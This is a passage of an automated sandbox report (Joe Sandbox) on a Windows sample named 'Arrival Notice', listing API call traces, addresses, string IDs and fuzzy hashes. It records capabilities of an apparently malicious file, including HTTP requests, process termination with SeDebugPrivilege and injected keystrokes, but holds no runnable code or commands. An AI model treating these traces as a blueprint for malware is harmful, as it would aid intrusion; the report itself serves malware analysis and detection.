                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B1B8
                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B1FD
                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B212
                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B21D
                  Similarity
                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                  • String ID:
                  • API String ID: 2156557900-0
                  • Opcode ID: 98aceb2023e2b03280c4016b28741d3a645369e2ee7da7509560b5b45b94a91f
                  • Instruction ID: ee35be9c631e8ded748611bde930762140f6dd5543dacac29b77e71249557dd2
                  • Opcode Fuzzy Hash: 98aceb2023e2b03280c4016b28741d3a645369e2ee7da7509560b5b45b94a91f
                  • Instruction Fuzzy Hash: 5731F775140204BFDB10AF64DC98FAE7B69FB12756F15842AF900C6350C7789D808FAC
                  APIs
                  • _free.LIBCMT ref: 003E2C94
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003E2CA0
                  • _free.LIBCMT ref: 003E2CAB
                  • _free.LIBCMT ref: 003E2CB6
                  • _free.LIBCMT ref: 003E2CC1
                  • _free.LIBCMT ref: 003E2CCC
                  • _free.LIBCMT ref: 003E2CD7
                  • _free.LIBCMT ref: 003E2CE2
                  • _free.LIBCMT ref: 003E2CED
                  • _free.LIBCMT ref: 003E2CFB
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 9a23871e58a0950978b7bb969e586b823647ee7ddf109d6eb8286d812fc9e378
                  • Instruction ID: 4e54f6e178d637ff9891cbc39880c9992fd088c9b31243c7234b778e08da4cec
                  • Opcode Fuzzy Hash: 9a23871e58a0950978b7bb969e586b823647ee7ddf109d6eb8286d812fc9e378
                  • Instruction Fuzzy Hash: 4011C676100158AFCB03EF56D842CDE3BA9FF06350F4256A1F9485F262D735EA609B90
                  APIs
                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003B1459
                  • OleUninitialize.OLE32(?,00000000), ref: 003B14F8
                  • UnregisterHotKey.USER32(?), ref: 003B16DD
                  • DestroyWindow.USER32(?), ref: 003F24B9
                  • FreeLibrary.KERNEL32(?), ref: 003F251E
                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003F254B
                  Strings
                  Similarity
                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                  • String ID: close all
                  • API String ID: 469580280-3243417748
                  • Opcode ID: d20911e851c82725478fd0d9e1aad652959d63d28e740c8e4823f1bc3c02f925
                  • Instruction ID: 6dbf46c55c7aa6a2b3ab21d9a67109e410641003a6978f6580973d857cd6b554
                  • Opcode Fuzzy Hash: d20911e851c82725478fd0d9e1aad652959d63d28e740c8e4823f1bc3c02f925
                  • Instruction Fuzzy Hash: 2ED19131702212CFDB2AEF15C4A5B69F7A4BF05704F5541AEEA4AAB661CB30EC12CF54
                  APIs
                  • SetWindowLongW.USER32(?,000000EB), ref: 003B5C7A
                    • Part of subcall function 003B5D0A: GetClientRect.USER32(?,?), ref: 003B5D30
                    • Part of subcall function 003B5D0A: GetWindowRect.USER32(?,?), ref: 003B5D71
                    • Part of subcall function 003B5D0A: ScreenToClient.USER32(?,?), ref: 003B5D99
                  • GetDC.USER32 ref: 003F46F5
                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003F4708
                  • SelectObject.GDI32(00000000,00000000), ref: 003F4716
                  • SelectObject.GDI32(00000000,00000000), ref: 003F472B
                  • ReleaseDC.USER32(?,00000000), ref: 003F4733
                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003F47C4
                  Strings
                  Similarity
                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                  • String ID: U
                  • API String ID: 4009187628-3372436214
                  • Opcode ID: fc677e4840fa1e1bd99849b0ebf48d416cd19167d317f5c3bdbdb149a02bf807
                  • Instruction ID: 73f95aa042ee5e0ecfb8a74948c7f89b8ded27e9a5270d7ccff9025375c113bc
                  • Opcode Fuzzy Hash: fc677e4840fa1e1bd99849b0ebf48d416cd19167d317f5c3bdbdb149a02bf807
                  • Instruction Fuzzy Hash: 4471F034400209DFCF239F64C984AFB7BB6FF4A364F19426AEE619A266C3318845DF50
                  APIs
                  • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004235E4
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • LoadStringW.USER32(00482390,?,00000FFF,?), ref: 0042360A
                  Strings
                  Similarity
                  • API ID: LoadString$_wcslen
                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                  • API String ID: 4099089115-2391861430
                  • Opcode ID: 229e3a85728a069ec867186ee69339a0534c5810b6df95df954ef307bf7e24de
                  • Instruction ID: ed557dc14541cfcd92895bfae8ca71481c883f6a77a2774ac585c67867556fa0
                  • Opcode Fuzzy Hash: 229e3a85728a069ec867186ee69339a0534c5810b6df95df954ef307bf7e24de
                  • Instruction Fuzzy Hash: 2551C271900219BBDF16EFA0DC82EEEBB79AF04305F54412AF605761A1DB381B89DF64
                  APIs
                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0042C272
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0042C29A
                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0042C2CA
                  • GetLastError.KERNEL32 ref: 0042C322
                  • SetEvent.KERNEL32(?), ref: 0042C336
                  • InternetCloseHandle.WININET(00000000), ref: 0042C341
                  Strings
                  Similarity
                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                  • String ID:
                  • API String ID: 3113390036-3916222277
                  • Opcode ID: af3a75dcbad2805c5ad75cd35eb8354f93f7da6261cb191a61eba0fe73de84ca
                  • Instruction ID: e348c8cf6aa10b71aa732f2fb69dfab264457aaab9c8feccf00bc1368b577dd3
                  • Opcode Fuzzy Hash: af3a75dcbad2805c5ad75cd35eb8354f93f7da6261cb191a61eba0fe73de84ca
                  • Instruction Fuzzy Hash: 3431D171600614AFD721DF65ACC4AAF7BFCEB09344B44892EF84693200DB78DC048BA9
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003F3AAF,?,?,Bad directive syntax error,0044CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004198BC
                  • LoadStringW.USER32(00000000,?,003F3AAF,?), ref: 004198C3
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00419987
                  Strings
                  Similarity
                  • API ID: HandleLoadMessageModuleString_wcslen
                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                  • API String ID: 858772685-4153970271
                  • Opcode ID: 07c5df791042ca0a78efca46b8540cd6f1e696f77ea5fecf34ec0f96ed1b1676
                  • Instruction ID: 03a10761e1435c154a7af38fd6026092dc3e4568abe9caeae85ffdd255a0fbb0
                  • Opcode Fuzzy Hash: 07c5df791042ca0a78efca46b8540cd6f1e696f77ea5fecf34ec0f96ed1b1676
                  • Instruction Fuzzy Hash: 8221943190021EBBCF16AF90CC56FEE7775FF14304F04446AF6196A0A2EB359A58CB55
                  APIs
                  • GetParent.USER32 ref: 004120AB
                  • GetClassNameW.USER32(00000000,?,00000100), ref: 004120C0
                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0041214D
                  Strings
                  Similarity
                  • API ID: ClassMessageNameParentSend
                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                  • API String ID: 1290815626-3381328864
                  • Opcode ID: f4c8f8e2adea624f590c1dafd8ab0099a133652bc223985371dd13d21640416f
                  • Instruction ID: 1f82a89b7f70e028907161c72be3631bf386f394759235610ee798f9b37e2623
                  • Opcode Fuzzy Hash: f4c8f8e2adea624f590c1dafd8ab0099a133652bc223985371dd13d21640416f
                  • Instruction Fuzzy Hash: 0111E77B684707BAF605A620EC06DFB379CDB05324B304127FB08ED1D1EAE968A2551C
                  APIs
                  Similarity
                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                  • String ID:
                  • API String ID: 1282221369-0
                  • Opcode ID: 1596b92aa821526b1e69cbf47881fb921b24d586eadb9620b01799b150cc0534
                  • Instruction ID: 54bf7503dce054ab4322565042f53205ac7bd2e78f317b81313191c3dffceb9f
                  • Opcode Fuzzy Hash: 1596b92aa821526b1e69cbf47881fb921b24d586eadb9620b01799b150cc0534
                  • Instruction Fuzzy Hash: DF614B729143B4AFDB23AFB69881A6E7BD9AF05310F06476DF9409B2C2D7319D038750
                  APIs
                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00445186
                  • ShowWindow.USER32(?,00000000), ref: 004451C7
                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 004451CD
                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 004451D1
                    • Part of subcall function 00446FBA: DeleteObject.GDI32(00000000), ref: 00446FE6
                  • GetWindowLongW.USER32(?,000000F0), ref: 0044520D
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0044521A
                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0044524D
                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00445287
                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00445296
                  Similarity
                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                  • String ID:
                  • API String ID: 3210457359-0
                  • Opcode ID: f9ba2146aa072bcb97d837218840156da155b6f150f8641ddcc1f82cda58b35d
                  • Instruction ID: e9c63f37f870348f2be02eb93eb7e89bc4219d63bf7280117bda603af5b0f44f
                  • Opcode Fuzzy Hash: f9ba2146aa072bcb97d837218840156da155b6f150f8641ddcc1f82cda58b35d
                  • Instruction Fuzzy Hash: 7651A230A41A08BFFF209F24CC49BDA3B65FB05325F148057F6159A2E2C7B9A981DF49
                  APIs
                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00406890
                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004068A9
                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004068B9
                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004068D1
                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004068F2
                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003C8874,00000000,00000000,00000000,000000FF,00000000), ref: 00406901
                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0040691E
                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003C8874,00000000,00000000,00000000,000000FF,00000000), ref: 0040692D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                  • String ID:
                  • API String ID: 1268354404-0
                  • Opcode ID: 1769bc82d4f927854ccc7804c84dbc052a77c1cd677f968d82f22980f72316cd
                  • Instruction ID: c2df7eed8063eb1a6917c19db08708874fb8feb9f5dc85e13520d49074141f56
                  • Opcode Fuzzy Hash: 1769bc82d4f927854ccc7804c84dbc052a77c1cd677f968d82f22980f72316cd
                  • Instruction Fuzzy Hash: 6F5186B0600209AFDB219F25CC95FAA7BB9EB48310F11452DF902E62A0DB74EE91CB54
                  APIs
                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0042C182
                  • GetLastError.KERNEL32 ref: 0042C195
                  • SetEvent.KERNEL32(?), ref: 0042C1A9
                    • Part of subcall function 0042C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0042C272
                    • Part of subcall function 0042C253: GetLastError.KERNEL32 ref: 0042C322
                    • Part of subcall function 0042C253: SetEvent.KERNEL32(?), ref: 0042C336
                    • Part of subcall function 0042C253: InternetCloseHandle.WININET(00000000), ref: 0042C341
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                  • String ID:
                  • API String ID: 337547030-0
                  • Opcode ID: 5802c32758a7eb6f27250652e35110b42b8dfed041e87d2ca7c9a99516d67b6e
                  • Instruction ID: 9a116f9ed6499e3bc4153896711a465b7670d648ff2caa74dd56046b5da11722
                  • Opcode Fuzzy Hash: 5802c32758a7eb6f27250652e35110b42b8dfed041e87d2ca7c9a99516d67b6e
                  • Instruction Fuzzy Hash: 4831B075A01611EFDB208FA5EC84A7BBBE9FF15300B44442EF94683210DB35E8109FA5
                  APIs
                    • Part of subcall function 00413A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00413A57
                    • Part of subcall function 00413A3D: GetCurrentThreadId.KERNEL32 ref: 00413A5E
                    • Part of subcall function 00413A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004125B3), ref: 00413A65
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 004125BD
                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004125DB
                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004125DF
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 004125E9
                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00412601
                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00412605
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0041260F
                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00412623
                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00412627
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                  • String ID:
                  • API String ID: 2014098862-0
                  • Opcode ID: efea093be5c013b95220df7ecd8b53802dc810aadc59b434ce54661d7d9d4fb8
                  • Instruction ID: 4899a6fb0d350c47be125b93783cc2f04327ccf893addce746cdefa0e7e7b8fb
                  • Opcode Fuzzy Hash: efea093be5c013b95220df7ecd8b53802dc810aadc59b434ce54661d7d9d4fb8
                  • Instruction Fuzzy Hash: 8E01D430391210BBFB106B699CCAF993F59DF4EB52F100016F318AE0D1C9E224848EAE
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00411449,?,?,00000000), ref: 0041180C
                  • HeapAlloc.KERNEL32(00000000,?,00411449,?,?,00000000), ref: 00411813
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00411449,?,?,00000000), ref: 00411828
                  • GetCurrentProcess.KERNEL32(?,00000000,?,00411449,?,?,00000000), ref: 00411830
                  • DuplicateHandle.KERNEL32(00000000,?,00411449,?,?,00000000), ref: 00411833
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00411449,?,?,00000000), ref: 00411843
                  • GetCurrentProcess.KERNEL32(00411449,00000000,?,00411449,?,?,00000000), ref: 0041184B
                  • DuplicateHandle.KERNEL32(00000000,?,00411449,?,?,00000000), ref: 0041184E
                  • CreateThread.KERNEL32(00000000,00000000,00411874,00000000,00000000,00000000), ref: 00411868
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                  • String ID:
                  • API String ID: 1957940570-0
                  • Opcode ID: 19bf8cacaaf99161d8716750727cb8438ccb54d781c8df98d9a1abe571d55500
                  • Instruction ID: 9ccecfd3b6bd379a1d1c6012f95ccf5806400509f0dbae678c083d6ef8d9f5f5
                  • Opcode Fuzzy Hash: 19bf8cacaaf99161d8716750727cb8438ccb54d781c8df98d9a1abe571d55500
                  • Instruction Fuzzy Hash: 4F01AC75241304BFE650ABA5DC89F573B6CEB8AB11F044421FA05DB1A1C6749C008F24
                  APIs
                    • Part of subcall function 0041D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0041D501
                    • Part of subcall function 0041D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0041D50F
                    • Part of subcall function 0041D4DC: CloseHandle.KERNEL32(00000000), ref: 0041D5DC
                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043A16D
                  • GetLastError.KERNEL32 ref: 0043A180
                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043A1B3
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043A268
                  • GetLastError.KERNEL32(00000000), ref: 0043A273
                  • CloseHandle.KERNEL32(00000000), ref: 0043A2C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                  • String ID: SeDebugPrivilege
                  • API String ID: 2533919879-2896544425
                  • Opcode ID: 8ded361650bfbde03106d56f419ac7a7aea05f5717ae71778006fedfd2ab3e4e
                  • Instruction ID: 2d0414676ee86f54c760025f1269954b420b7627d97b752695abbdd9795bb147
                  • Opcode Fuzzy Hash: 8ded361650bfbde03106d56f419ac7a7aea05f5717ae71778006fedfd2ab3e4e
                  • Instruction Fuzzy Hash: 3A61BF342442429FD720DF15C494F66BBE1AF48318F18849DE4A68FBA3C77AEC45CB96
                  APIs
                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00443925
                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0044393A
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00443954
                  • _wcslen.LIBCMT ref: 00443999
                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 004439C6
                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004439F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$Window_wcslen
                  • String ID: SysListView32
                  • API String ID: 2147712094-78025650
                  • Opcode ID: 7a96ad779160243f7b108113637aff4379f2bac6035113b89176ef06d8515872
                  • Instruction ID: 75e1a4c6a3c4a8fbca05aed3e61d89afc2e47cf3e8e65431971761136e42d0ef
                  • Opcode Fuzzy Hash: 7a96ad779160243f7b108113637aff4379f2bac6035113b89176ef06d8515872
                  • Instruction Fuzzy Hash: 5E41C371A00218ABEF219F64CC45BEB7BA9EF08750F10052BF958E7281D7759D80CB94
                  APIs
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0041BCFD
                  • IsMenu.USER32(00000000), ref: 0041BD1D
                  • CreatePopupMenu.USER32 ref: 0041BD53
                  • GetMenuItemCount.USER32(010E64B8), ref: 0041BDA4
                  • InsertMenuItemW.USER32(010E64B8,?,00000001,00000030), ref: 0041BDCC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                  • String ID: 0$2
                  • API String ID: 93392585-3793063076
                  • Opcode ID: 41d884ff71d02a3bcdec895c5a99e34cfbb3a93960d0377731552ee96baff134
                  • Instruction ID: cb7d11838a69b93171643ccbce537f0e1090d7da4711704e543398325950d2ac
                  • Opcode Fuzzy Hash: 41d884ff71d02a3bcdec895c5a99e34cfbb3a93960d0377731552ee96baff134
                  • Instruction Fuzzy Hash: 6451BF70A00205ABDB19CFA9E8C4BEEBBF5EF49314F14416EE441D7390D7789981CB9A
                  APIs
                  • _ValidateLocalCookies.LIBCMT ref: 003D2D4B
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 003D2D53
                  • _ValidateLocalCookies.LIBCMT ref: 003D2DE1
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 003D2E0C
                  • _ValidateLocalCookies.LIBCMT ref: 003D2E61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                  • String ID: &H=$csm
                  • API String ID: 1170836740-1825882931
                  • Opcode ID: 6072ca1b43d4e1f232ef885fe0f337ea4bb1eec8e8e1e8e13137dec9ff043269
                  • Instruction ID: 86e4ca47e1e106977ae5892743878c07215b1f57997587e4345b02c232326f0d
                  • Opcode Fuzzy Hash: 6072ca1b43d4e1f232ef885fe0f337ea4bb1eec8e8e1e8e13137dec9ff043269
                  • Instruction Fuzzy Hash: EC41A436E00209ABCF12DF68E845A9FBBB5BF54314F158167E8246B352D7319E05CBD1
                  APIs
                  • LoadIconW.USER32(00000000,00007F03), ref: 0041C913
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconLoad
                  • String ID: blank$info$question$stop$warning
                  • API String ID: 2457776203-404129466
                  • Opcode ID: a6c0f2f7418e9f964c882979897fd1218ead8c9103fe58b4f1c7c94810727b9f
                  • Instruction ID: 738e5bef0a0a5fafaab3de3ab6d39bb64d6763a1c8542dcab7fb76363e5a797e
                  • Opcode Fuzzy Hash: a6c0f2f7418e9f964c882979897fd1218ead8c9103fe58b4f1c7c94810727b9f
                  • Instruction Fuzzy Hash: 28115B726D9706BBA7056B14ACC3DEF239CCF15364B20002BF404AE382D7785E8052AD
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$LocalTime
                  • String ID:
                  • API String ID: 952045576-0
                  • Opcode ID: 06f5d59f7d64faf30be5b7592e25142b4ae6df68760d7f49f80d594e025b1ac2
                  • Instruction ID: 35152316ad8db58a07932cbf4688054dcbe8d8d0a157e56b5275571f0bbe6c54
                  • Opcode Fuzzy Hash: 06f5d59f7d64faf30be5b7592e25142b4ae6df68760d7f49f80d594e025b1ac2
                  • Instruction Fuzzy Hash: E5418466C1021876CB12EBB59C8B9CF77A8AF45710F504863F914E7222FB34E255C7E9
                  APIs
                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0040682C,00000004,00000000,00000000), ref: 003CF953
                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0040682C,00000004,00000000,00000000), ref: 0040F3D1
